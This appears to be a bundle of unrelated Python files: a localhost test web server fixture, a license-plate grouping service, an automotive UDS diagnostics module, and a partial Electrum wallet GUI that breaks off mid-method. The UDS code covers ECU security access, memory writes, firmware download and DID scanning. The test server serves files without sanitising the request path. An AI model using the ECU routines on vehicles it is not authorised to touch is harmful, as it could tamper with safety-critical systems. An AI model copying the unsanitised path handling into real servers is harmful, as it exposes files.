#-----------------------------------------------------------------------------
import logging
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
from http.server import BaseHTTPRequestHandler, HTTPServer
from io import open
import os
import socket
import threading
from urllib.request import URLopener
# External imports
import pytest
# Bokeh imports
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
DEFAULT_HOST = "127.0.0.1"
DEFAULT_PORT = 8000
HTML_ROOT = os.path.dirname(__file__)
WEBDRIVER = os.environ.get('WEBDRIVER', "<undefined>")
__all__ = (
'file_server',
'HtmlOnlyHandler',
'SimpleWebServer',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
class HtmlOnlyHandler(BaseHTTPRequestHandler):
"""Http handler."""
def do_GET(self):
"""GET method handler."""
try:
            path = self.path[1:].split('?')[0]
            with open(os.path.join(HTML_ROOT, path), 'r', encoding='latin-1') as html:
                self.send_response(200)
                self.send_header('Content-type', 'text/html')
                self.end_headers()
                self.wfile.write(html.read().encode('utf-8'))
except IOError:
self.send_error(404, 'File Not Found: %s' % path)
def log_message(self, format, *args):
"""Override default to avoid trashing stderr"""
pass
class SimpleWebServer(object):
"""A very basic web server."""
def __init__(self, host=DEFAULT_HOST, port=DEFAULT_PORT):
self.stop_serving = False
while True:
try:
self.server = HTTPServer(
(host, port), HtmlOnlyHandler)
self.host = host
self.port = port
break
except socket.error:
log.debug("port %d is in use, trying to next one" % port)
port += 1
self.thread = threading.Thread(target=self._run_web_server)
def _run_web_server(self):
"""Runs the server loop."""
log.debug("web server started")
while not self.stop_serving:
self.server.handle_request()
self.server.server_close()
def start(self):
"""Starts the server."""
self.thread.start()
def stop(self):
"""Stops the server."""
self.stop_serving = True
try:
# This is to force stop the server loop
URLopener().open("http://%s:%d" % (self.host, self.port))
except IOError:
pass
log.info("Shutting down the webserver")
self.thread.join()
def where_is(self, path):
return "http://%s:%d/%s" % (self.host, self.port, path)
@pytest.fixture(scope='session')
def file_server(request):
server = SimpleWebServer()
server.start()
request.addfinalizer(server.stop)
return server
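# A minimal usage sketch (added for illustration; not part of the original
# module). A test can depend on the session-scoped fixture above and build
# URLs with where_is(); 'some_page.html' is a hypothetical file that would
# need to exist under HTML_ROOT.
#
#   def test_serves_html(file_server):
#       url = file_server.where_is('some_page.html')
#       assert url == "http://%s:%d/some_page.html" % (file_server.host, file_server.port)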
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
_html_root_error_message = "Can't find 'common_web' directory, try setting WEBDRIVER environment variable WEBDRIVER:" + WEBDRIVER + " HTML_ROOT:" + HTML_ROOT
if not os.path.isdir(HTML_ROOT):
log.error(_html_root_error_message)
assert 0, _html_root_error_message
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Taken from
# https://github.com/SeleniumHQ/selenium/blob/52e9d6407248bce5de2b6a73103a50bb0e670c1f/py/test/selenium/webdriver/common/webserver.py
# with small modifications
|
license_plate_service.py
|
# license plate service class
from threading import Thread
from get_system_uptime import get_system_uptime
import copy
class licensePlateService:
def __init__(self, detection_box_reference, db_reference):
self.detection_box_reference = detection_box_reference
self.db_reference = db_reference
self.stopped = False
self.notified = False
self.ordered_license_plate_list = []
self.groups_list = []
def start(self):
Thread(target=self.update, args=()).start()
return self
def update(self):
while True:
if self.stopped:
return
if self.notified:
# this means that a new license plate has been added to the list
# time to sort and place that new plate
self.notified = False
                # copy contents into a buffer and flush the original buffer
                temp_license_plate_list = self.detection_box_reference.license_plate_list
                self.detection_box_reference.license_plate_list = []
                # use temp_license_plate_list as a buffer of new data to be sorted into the ordered list
# order based on time stamp
temp_license_plate_list.sort(key=lambda x: x.time_spotted)
# add ordered list to total list, merge
self.ordered_license_plate_list += temp_license_plate_list
# ordered list based on time, separate into groups based on time difference
time_differential_indexes = [] # time differential index list, difference between [i+1] - [i]
                min_time_differential = 3 # seconds, should be configurable: the minimum gap between sequential plates' time_spotted values that starts a new group
                max_wait_time = 10 # seconds, should be configurable: the maximum gap between the last plate's time_spotted and the system uptime before the trailing group is flushed
for i in range(len(self.ordered_license_plate_list)):
# check if last element in list
if i == len(self.ordered_license_plate_list)-1:
break
difference = self.ordered_license_plate_list[i+1].time_spotted - self.ordered_license_plate_list[i].time_spotted
if difference >= min_time_differential:
time_differential_indexes.append(i)
                # find the system difference with the LAST plate in the list; only operate if self.ordered_license_plate_list is not empty
if len(self.ordered_license_plate_list) != 0:
system_difference = get_system_uptime() - self.ordered_license_plate_list[len(self.ordered_license_plate_list)-1].time_spotted
if system_difference >= max_wait_time:
time_differential_indexes.append((len(self.ordered_license_plate_list)-1))
groups = [] # groupings of indexes, grouped by time differentials calculated above
last_index = 0
for index in time_differential_indexes:
group = range(last_index, index + 1)
last_index = index + 1
groups.append(group)
                # groups is a list of ranges; use them to remove plates from ordered_license_plate_list and append them as lists to self.groups_list
                index_decrement = 0 # every time a plate is deleted, index_decrement goes up by one; this compensates for the index shift in a list of changing size
for group in groups:
temp_plate_group = []
for index in group:
plate = self.ordered_license_plate_list[index - index_decrement]
index_decrement += 1
temp_plate_group.append(plate)
self.ordered_license_plate_list.remove(plate)
self.groups_list.append(temp_plate_group)
for group in self.groups_list:
# find and publish the most confident plate in the group
most_confident_plate = group[0]
for plate in group:
if plate.confidence > most_confident_plate.confidence:
most_confident_plate = plate
self.db_reference.write_to_database(copy.deepcopy(most_confident_plate))
self.groups_list = []
def stop(self):
self.stopped = True
def notify(self):
self.notified = True
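# A simplified standalone sketch (added) of the grouping rule implemented in
# update() above: plates sorted by time_spotted are split into groups wherever
# consecutive timestamps differ by at least min_time_differential seconds. The
# trailing plates are returned separately because the real service holds them
# back until max_wait_time passes with no new detections. The timestamps here
# are illustrative plain numbers.
def _example_grouping(timestamps, min_time_differential=3):
    split_indexes = [i for i in range(len(timestamps) - 1)
                     if timestamps[i + 1] - timestamps[i] >= min_time_differential]
    groups, last = [], 0
    for i in split_indexes:
        groups.append(timestamps[last:i + 1])
        last = i + 1
    return groups, timestamps[last:]
# _example_grouping([1, 2, 7, 8, 15]) -> ([[1, 2], [7, 8]], [15])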
|
__init__.py
|
from __future__ import print_function
from builtins import input
import sys
import time
import cancat
import struct
import threading
import cancat.iso_tp as cisotp
# In 11-bit CAN, an OBD2 tester typically sends requests with an ID of 7DF, and
# can accept response messages on IDs 7E8 to 7EF, requests to a specific ECU can
# be sent from ID 7E0 to 7E7. So the non-OBD2 range normally ends at 7D7,
# although I can't find a specific "standard" for this.
#
# In 29-bit CAN an OBD2 tester typically sends requests with an ID of 0x18DB33F1
# where 0x18DBxxxx indicates this is an OBD2 message, 0x33 indicates this
# message is for the OBD2 ECU(s), and 0xF1 is the tester. Normal UDS messages
# use a prefix of 0x18DAxxxx.
# 0xF1 is used as a tester address in normal UDS messaging as well.
ARBID_CONSTS = {
'11bit': {
'prefix': 0x700,
'prefix_mask': 0xF00,
'resp_offset': 8, # rxid is normally the txid + 8
'max_req_id': 0xF7,
'obd2_broadcast': 0x7DF,
},
'29bit': {
'prefix': 0x18DA0000,
'prefix_mask': 0xFFFF0000,
'destid_mask': 0x0000FF00,
'destid_shift': 8,
'srcid_mask': 0x000000FF,
'tester': 0xF1,
'obd2_broadcast': 0x18DA33F1,
}
}
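# A small illustrative helper (added; not part of the original module) showing
# how the ARBID_CONSTS table above maps a tester request ID to the expected
# response ID in both addressing modes. The ECU address 0x10 is an arbitrary
# example value.
def _example_arbids(ecu_addr=0x10):
    # 11-bit: responses normally arrive at txid + resp_offset (0x7E0 -> 0x7E8)
    tx_11 = ARBID_CONSTS['11bit']['prefix'] | 0xE0
    rx_11 = tx_11 + ARBID_CONSTS['11bit']['resp_offset']
    # 29-bit: 0x18DA<dest><src>; the response swaps destination and source
    c29 = ARBID_CONSTS['29bit']
    tx_29 = c29['prefix'] | (ecu_addr << c29['destid_shift']) | c29['tester']
    rx_29 = c29['prefix'] | (c29['tester'] << c29['destid_shift']) | ecu_addr
    return (hex(tx_11), hex(rx_11), hex(tx_29), hex(rx_29))
# _example_arbids() -> ('0x7e0', '0x7e8', '0x18da10f1', '0x18daf110')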
ISO_14229_DIDS = {
0xF180: 'bootSoftwareIdentificationDataIdentifier',
0xF181: 'applicationSoftwareIdentificationDataIdentifier',
0xF182: 'applicationDataIdentificationDataIdentifier',
0xF183: 'bootSoftwareFingerprintDataIdentifier',
0xF184: 'applicationSoftwareFingerprintDataIdentifier',
0xF185: 'applicationDataFingerprintDataIdentifier',
0xF186: 'activeDiagnosticSessionDataIdentifier',
0xF187: 'vehicleManufacturerSparePartNumberDataIdentifier',
0xF188: 'vehicleManufacturerECUSoftwareNumberDataIdentifier',
0xF189: 'vehicleManufacturerECUSoftwareVersionNumberDataIdentifier',
0xF18A: 'systemSupplierIdentifierDataIdentifier',
0xF18B: 'ECUManufacturingDateDataIdentifier',
0xF18C: 'ECUSerialNumberDataIdentifier',
0xF18D: 'supportedFunctionalUnitsDataIdentifier',
0xF18E: 'vehicleManufacturerKitAssemblyPartNumberDataIdentifier',
0xF190: 'VINDataIdentifier',
0xF191: 'vehicleManufacturerECUHardwareNumberDataIdentifier',
0xF192: 'systemSupplierECUHardwareNumberDataIdentifier',
0xF193: 'systemSupplierECUHardwareVersionNumberDataIdentifier',
0xF194: 'systemSupplierECUSoftwareNumberDataIdentifier',
0xF195: 'systemSupplierECUSoftwareVersionNumberDataIdentifier',
0xF196: 'exhaustRegulationOrTypeApprovalNumberDataIdentifier',
0xF197: 'systemNameOrEngineTypeDataIdentifier',
0xF198: 'repairShopCodeOrTesterSerialNumberDataIdentifier',
0xF199: 'programmingDateDataIdentifier',
    0xF19A: 'calibrationRepairShopCodeOrCalibrationEquipmentSerialNumberDataIdentifier',
0xF19B: 'calibrationDateDataIdentifier',
0xF19C: 'calibrationEquipmentSoftwareNumberDataIdentifier',
0xF19D: 'ECUInstallationDateDataIdentifier',
0xF19E: 'ODXFileDataIdentifier',
0xF19F: 'entityDataIdentifier',
}
NEG_RESP_CODES = {
0x10:'GeneralReject',
0x11:'ServiceNotSupported',
0x12:'SubFunctionNotSupported',
    0x13:'IncorrectMessageLengthOrInvalidFormat',
0x14:'ResponseTooLong',
0x21:'BusyRepeatRequest',
0x22:'ConditionsNotCorrect',
0x24:'RequestSequenceError',
0x25:'NoResponseFromSubnetComponent',
0x26:'FailurePreventsExecutionOfRequestedAction',
0x31:'RequestOutOfRange',
0x33:'SecurityAccessDenied',
0x35:'InvalidKey',
0x36:'ExceedNumberOfAttempts',
0x37:'RequiredTimeDelayNotExpired',
0x70:'UploadDownloadNotAccepted',
0x71:'TransferDataSuspended',
0x72:'GeneralProgrammingFailure',
0x73:'WrongBlockSequenceCounter',
0x78:'RequestCorrectlyReceived-ResponsePending',
0x7e:'SubFunctionNotSupportedInActiveSession',
0x7f:'ServiceNotSupportedInActiveSession',
0x81:'RpmTooHigh',
0x82:'RpmTooLow',
0x83:'EngineIsRunning',
0x84:'EngineIsNotRunning',
0x85:'EngineRunTimeTooLow',
0x86:'TemperatureTooHigh',
0x87:'TemperatureTooLow',
0x88:'VehicleSpeedTooHigh',
0x89:'VehicleSpeedTooLow',
0x8a:'ThrottlePedalTooHigh',
0x8b:'ThrottlePedalTooLow',
0x8c:'TransmissionRangeNotInNeutral',
0x8d:'TransmissionRangeNotInGear',
    0x8f:'BrakeSwitchesNotClosed',
0x90:'ShifterLeverNotInPark',
0x91:'TorqueConverterClutchLocked',
0x92:'VoltageTooHigh',
0x93:'VoltageTooLow',
}
SVC_DIAGNOSTICS_SESSION_CONTROL = 0x10
SVC_ECU_RESET = 0x11
SVC_CLEAR_DIAGNOSTICS_INFORMATION = 0x14
SVC_READ_DTC_INFORMATION = 0x19
SVC_READ_DATA_BY_IDENTIFIER = 0x22
SVC_READ_MEMORY_BY_ADDRESS = 0x23
SVC_SECURITY_ACCESS = 0x27
SVC_READ_DATA_BY_PERIODIC_IDENTIFIER = 0x2a
SVC_DYNAMICALLY_DEFINE_DATA_IDENTIFIER = 0x2c
SVC_WRITE_DATA_BY_IDENTIFIER = 0x2e
SVC_INPUT_OUTPUT_CONTROL_BY_IDENTIFIER = 0x2f
SVC_ROUTINE_CONTROL = 0x31
SVC_REQUEST_DOWNLOAD = 0x34
SVC_REQUEST_UPLOAD = 0x35
SVC_TRANSFER_DATA = 0x36
SVC_REQUEST_TRANSFER_EXIT = 0x37
SVC_WRITE_MEMORY_BY_ADDRESS = 0x3d
SVC_TESTER_PRESENT = 0x3e
SVC_NEGATIVE_RESPONSE = 0x7f
SVC_CONTROL_DTC_SETTING = 0x85
UDS_SVCS = { v:k for k,v in globals().items() if k.startswith('SVC_') }
POS_RESP_CODES = { (k|0x40) : "OK_" + v.lower() for k,v in UDS_SVCS.items() }
POS_RESP_CODES[0] = 'Success'
NEG_RESP_REPR = {k: 'ERR_' + v for k, v in NEG_RESP_CODES.items()}
RESP_CODES = {}
RESP_CODES.update(NEG_RESP_REPR)
RESP_CODES.update(POS_RESP_CODES)
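# Illustrative note (added): per ISO 14229 a positive response SID is the
# request SID with bit 0x40 set, which is exactly how POS_RESP_CODES is built
# above. For example:
#   UDS_SVCS[0x22]       == 'SVC_READ_DATA_BY_IDENTIFIER'
#   POS_RESP_CODES[0x62] == 'OK_svc_read_data_by_identifier'
#   RESP_CODES[0x33]     == 'ERR_SecurityAccessDenied'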
class NegativeResponseException(Exception):
def __init__(self, neg_code, svc, msg):
self.neg_code = neg_code
self.msg = msg
self.svc = svc
    def __str__(self):
        negresprepr = NEG_RESP_CODES.get(self.neg_code)
        return "NEGATIVE RESPONSE to 0x%x (%s): ERROR 0x%x: %s \tmsg: %s" % \
                (self.svc, UDS_SVCS.get(self.svc), self.neg_code, negresprepr, self.msg)
    __repr__ = __str__
class UDS(object):
def __init__(self, c, tx_arbid, rx_arbid=None, verbose=True, extflag=0, timeout=3.0):
self.c = c
self.t = None
self.verbose = verbose
self.extflag = extflag
self.timeout = timeout
if rx_arbid == None:
rx_arbid = tx_arbid + 8 # by UDS spec
self.tx_arbid = tx_arbid
self.rx_arbid = rx_arbid
def xmit_recv(self, data, extflag=0, count=1, service=None):
msg, idx = self.c.ISOTPxmit_recv(self.tx_arbid, self.rx_arbid, data, extflag, self.timeout, count, service)
# check if the response is something we know about and can help out
if msg != None and len(msg):
svc = data[0]
svc_resp = msg[0]
errcode = 0
if len(msg) >= 3:
errcode = msg[2]
if svc_resp == svc + 0x40:
if self.verbose:
print("Positive Response!")
negresprepr = NEG_RESP_CODES.get(errcode)
if negresprepr != None and svc_resp != svc + 0x40:
if self.verbose > 1:
print(negresprepr + "\n")
# TODO: Implement getting final message if ResponseCorrectlyReceivedResponsePending is received
if errcode != 0x78: # Don't throw an exception for ResponseCorrectlyReceivedResponsePending
raise NegativeResponseException(errcode, svc, msg)
else:
# Try again but increment the start index
msg, idx = self.c._isotp_get_msg(self.rx_arbid, start_index = idx+1, service = service, timeout = self.timeout)
return msg
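    # Frame-format note (added): a UDS negative response is the three bytes
    # [0x7F, <request SID>, <NRC>], which is why xmit_recv() reads msg[2] as
    # the error code, while a positive response echoes the request SID with
    # 0x40 added (e.g. request 0x10 -> response 0x50).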
def _do_Function(self, func, data=None, subfunc=None, service=None):
if subfunc != None:
omsg = struct.pack('>BB', func, subfunc)
else:
omsg = struct.pack('>B', func)
if data != None:
omsg += data
msg = self.xmit_recv(omsg, extflag=self.extflag, service=service)
return msg
    def SendTesterPresent(self):
        while self.TesterPresent is True:
            if self.TesterPresentRequestsResponse:
                # TesterPresent (0x3E) with sub-function 0x00: a response is requested
                self.c.CANxmit(self.tx_arbid, bytes.fromhex("023E000000000000"))
            else:
                # sub-function 0x80 sets suppressPosRspMsgIndicationBit: no response
                self.c.CANxmit(self.tx_arbid, bytes.fromhex("023E800000000000"))
            time.sleep(2.0)
def StartTesterPresent(self, request_response=True):
self.TesterPresent = True
self.TesterPresentRequestsResponse=request_response
self.t = threading.Thread(target = self.SendTesterPresent)
        self.t.daemon = True
self.t.start()
def StopTesterPresent(self):
self.TesterPresent = False
if self.t is not None:
self.t.join(5.0)
            if self.t.is_alive():
if self.verbose:
print("Error killing Tester Present thread")
self.t = None
def DiagnosticSessionControl(self, session):
currIdx = self.c.getCanMsgCount()
        return self._do_Function(SVC_DIAGNOSTICS_SESSION_CONTROL, struct.pack('>B', session), service=0x50)
def ReadMemoryByAddress(self, address, size):
currIdx = self.c.getCanMsgCount()
return self._do_Function(SVC_READ_MEMORY_BY_ADDRESS, subfunc=0x24, data=struct.pack(">IH", address, size), service = 0x63)
#return self.xmit_recv("\x23\x24" + struct.pack(">I", address) + struct.pack(">H", size), service = 0x63)
def ReadDID(self, did):
'''
Read the Data Identifier specified from the ECU.
Returns: The response ISO-TP message as a string
'''
msg = self._do_Function(SVC_READ_DATA_BY_IDENTIFIER, struct.pack('>H', did), service=0x62)
#msg = self.xmit_recv("22".decode('hex') + struct.pack('>H', did), service=0x62)
return msg
def WriteDID(self, did, data):
'''
Write the Data Identifier specified from the ECU.
Returns: The response ISO-TP message as a string
'''
msg = self._do_Function(SVC_WRITE_DATA_BY_IDENTIFIER,struct.pack('>H', did) + data, service=0x62)
#msg = self.xmit_recv("22".decode('hex') + struct.pack('>H', did), service=0x62)
return msg
def RequestDownload(self, addr, data, data_format = 0x00, addr_format = 0x44):
'''
Assumes correct Diagnostics Session and SecurityAccess
'''
# Figure out the right address and data length formats
pack_fmt_str = ">BB"
try:
pack_fmt_str += {1:"B", 2:"H", 4:"I"}.get(addr_format >> 4) + {1:"B", 2:"H", 4:"I"}.get(addr_format & 0xf)
except TypeError:
print("Cannot parse addressAndLengthFormatIdentifier", hex(addr_format))
return None
        msg = self.xmit_recv(b"\x34" + struct.pack(pack_fmt_str, data_format, addr_format, addr, len(data)), extflag=self.extflag, service = 0x74)
        # Parse the response
        if msg[0] != 0x74:
            print("Error received: {}".format(msg.hex()))
return msg
        max_txfr_num_bytes = msg[1] >> 4 # number of bytes in the max transfer length parameter
max_txfr_len = 0
for i in range(2,2+max_txfr_num_bytes):
max_txfr_len <<= 8
max_txfr_len += msg[i]
# Transfer data
data_idx = 0
block_idx = 1
while data_idx < len(data):
            msg = self.xmit_recv(b"\x36" + bytes([block_idx]) + data[data_idx:data_idx+max_txfr_len-2], extflag=self.extflag, service = 0x76)
data_idx += max_txfr_len - 2
block_idx += 1
if block_idx > 0xff:
block_idx = 0
# error checking
if msg is not None and msg[0] == 0x7f and msg[2] != 0x78:
print("Error sending data: {}".format(msg.encode('hex')))
return None
if msg is None:
print("Didn't get a response?")
data_idx -= max_txfr_len - 2
block_idx -= 1
if block_idx == 0:
block_idx = 0xff
# TODO: need to figure out how to get 2nd isotp message to verify that this worked
# Send RequestTransferExit
self._do_Function(SVC_REQUEST_TRANSFER_EXIT, service = 0x77)
def readMemoryByAddress(self, address, length, lenlen=1, addrlen=4):
'''
Work in progress!
'''
if lenlen == 1:
lfmt = "B"
else:
lfmt = "H"
lenlenbyte = (lenlen << 4) | addrlen
msg = self._do_Function(SVC_READ_MEMORY_BY_ADDRESS, data=struct.pack('<BI' + lfmt, lenlenbyte, address, length), service=0x63)
return msg
    def writeMemoryByAddress(self, address, data, lenlen=1, addrlen=4):
        '''
        Work in progress!
        '''
        if lenlen == 1:
            lfmt = "B"
        else:
            lfmt = "H"
        lenlenbyte = (lenlen << 4) | addrlen
        # pack the format byte, the address and the payload length, then append
        # the payload itself (the original overwrote `data` and referenced an
        # undefined `length` variable)
        payload = struct.pack('<BI' + lfmt, lenlenbyte, address, len(data)) + data
        msg = self._do_Function(SVC_WRITE_MEMORY_BY_ADDRESS, data=payload, service=0x63)
        return msg
def RequestUpload(self, addr, length, data_format = 0x00, addr_format = 0x44):
'''
Work in progress!
'''
        msg = self._do_Function(SVC_REQUEST_UPLOAD, subfunc=data_format, data = bytes([addr_format]) + struct.pack('>I', addr)[1:] + struct.pack('>I', length)[1:])
        sid, lfmtid, maxnumblocks = struct.unpack('>BBH', msg[:4])
        output = []
        for loop in range(maxnumblocks):
            msg = self._do_Function(SVC_TRANSFER_DATA, subfunc=loop)
            output.append(msg)
            if len(msg) and msg[0] != 0x76:
                print("FAILURE TO DOWNLOAD ALL. Returning what we have so far (including error message)")
                return output
        msg = self._do_Function(SVC_REQUEST_TRANSFER_EXIT)
        if len(msg) and msg[0] != 0x77:
            print("FAILURE TO EXIT CLEANLY. Returning what we received.")
        return output
def EcuReset(self, rst_type=0x1):
return self._do_Function(SVC_ECU_RESET, subfunc=rst_type)
def ClearDiagnosticInformation(self):
pass
def ReadDTCInfomation(self):
pass
def ReadDataByPeriodicIdentifier(self, pdid):
pass
def DynamicallyDefineDataIdentifier(self):
pass
def InputOutputControlByIdentifier(self, iodid):
pass
def RoutineControl(self, rid):
pass
def TransferData(self, did):
pass
def RequestTransferExit(self):
pass
def ControlDTCSetting(self):
pass
def ScanDIDs(self, start=0, end=0x10000, delay=0):
success = []
try:
for x in range(start, end):
try:
if self.verbose:
sys.stderr.write(' %x ' % x)
val = self.ReadDID(x)
success.append((x, val))
except KeyboardInterrupt:
raise
except Exception as e:
if self.verbose > 1:
print(e)
time.sleep(delay)
except KeyboardInterrupt:
print("Stopping Scan during DID 0x%x " % x)
return success
return success
def SecurityAccess(self, level, key = ""):
"""Send and receive the UDS messages to switch SecurityAccess levels.
@level = the SecurityAccess level to switch to
@key = a SecurityAccess algorithm specific key
"""
msg = self._do_Function(SVC_SECURITY_ACCESS, subfunc=level, service = 0x67)
if msg is None:
return msg
        if msg[0] == 0x7f:
            print("Error getting seed:", msg.hex())
        else:
            seed = msg[2:]
            hexified_seed = " ".join("%02x" % x for x in seed)
            key = bytes(bytearray(self._key_from_seed(hexified_seed, key)))
            msg = self._do_Function(SVC_SECURITY_ACCESS, subfunc=level+1, data=key, service = 0x67)
            return msg
def _key_from_seed(self, seed, secret):
"""Generates the key for a specific SecurityAccess seed request.
@seed = the SecurityAccess seed received from the ECU. Formatted
as a hex string with spaces between each seed byte.
@secret = a SecurityAccess algorithm specific key
Returns the key, as a string of key bytes.
"""
print("Not implemented in this class")
return 0
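# A hypothetical usage sketch (added): assuming `c` is an already-connected
# cancat interface object, reading the VIN (DID 0xF190 per ISO_14229_DIDS
# above) from an ECU at the conventional 11-bit tester address 0x7E0 might
# look like this:
#
#   u = UDS(c, 0x7e0)            # rx_arbid defaults to tx_arbid + 8 = 0x7e8
#   u.StartTesterPresent()
#   vin = u.ReadDID(0xF190)      # raw ISO-TP response: 0x62, DID, then data
#   u.StopTesterPresent()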
def printUDSSession(c, tx_arbid, rx_arbid=None, paginate=45):
if rx_arbid == None:
rx_arbid = tx_arbid + 8 # by UDS spec
msgs = [msg for msg in c.genCanMsgs(arbids=[tx_arbid, rx_arbid])]
msgs_idx = 0
linect = 1
while msgs_idx < len(msgs):
arbid, isotpmsg, count = cisotp.msg_decode(msgs, msgs_idx)
#print("Message: (%s:%s) \t %s" % (count, msgs_idx, isotpmsg.encode('hex')))
svc = isotpmsg[0]
mtype = (RESP_CODES, UDS_SVCS)[arbid==tx_arbid].get(svc, '')
print("Message: (%s:%s) \t %-30s %s" % (count, msgs_idx, isotpmsg.encode('hex'), mtype))
msgs_idx += count
if paginate:
if (linect % paginate)==0:
input("%x) PRESS ENTER" % linect)
linect += 1
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from electrum.bitcoin import TYPE_ADDRESS
from electrum.storage import WalletStorage
from electrum.wallet import Wallet, InternalAddressCorruption
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword, send_exception_to_crash_reporter
from electrum.plugin import run_hook
from electrum.util import format_satoshis, format_satoshis_plain, format_fee_satoshis
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register the widget cache for keeping memory usage down; the timeout is set
# to forever so the data stays cached
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'fujicoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
